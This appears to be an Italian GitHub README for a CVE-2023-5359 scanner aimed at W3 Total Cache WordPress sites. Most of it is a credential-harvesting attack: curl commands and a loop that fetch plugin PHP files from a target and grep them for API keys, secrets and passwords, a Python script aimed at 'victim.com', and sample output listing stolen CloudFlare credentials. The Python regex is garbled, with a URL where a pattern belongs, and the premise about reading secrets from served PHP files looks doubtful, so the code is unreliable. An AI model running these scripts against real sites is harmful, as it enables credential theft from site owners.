
CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Rileva credenziali esposte nelle versioni del plugin W3 Total Cache ≤ 2.7.5.
CVE-2023-5359 è una vulnerabilità di archiviazione in chiaro che interessa il plugin WordPress W3 Total Cache nelle versioni ≤ 2.7.5. Questa vulnerabilità consente a utenti malintenzionati remoti di accedere a credenziali sensibili archiviate in file PHP non crittografati e accessibili pubblicamente.
W3 Total Cache memorizza le impostazioni di configurazione e le credenziali API in file PHP all'interno della directory /wp-content/plugins/w3-total-cache/ senza un'adeguata protezione. Questi file sono accessibili tramite HTTP, esponendo:
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
# Verifica se W3 Total Cache è installato
curl -s https://target.com/ | grep "w3-total-cache"
# Estrai le credenziali CloudFlare
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
# Cerca in tutti i file vulnerabili
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
echo "=== $file ==="
curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
#!/usr/bin/env python3
import requests
import re
target = "https://victim.com"
files = [
"/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
"/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]
for file in files:
response = requests.get(target + file)
credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
if credentials:
print(f"[!] Credentials found in {file}:")
for key, value in credentials:
print(f" {key}: {value}")
Un utente malintenzionato può ottenere:
# Protezione .htaccess
<Files *.php>
Deny from all
</Files>
<Files "w3-total-cache.php">
Allow from all
</Files>
# Verifica la versione vulnerabile
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
[*] Scansione: https://example.com
[+] W3 Total Cache rilevato
[+] File accessibile: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENZIALI TROVATE:
client_id: GAxxxxxxxxxxxx78
client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
Questo repository è solo per scopi educativi e test di penetrazione autorizzati. L'uso malevolo di queste informazioni è severamente proibito.
Hai trovato utili queste informazioni? Metti una stella al repository!
Ultimo aggiornamento: Novembre 2025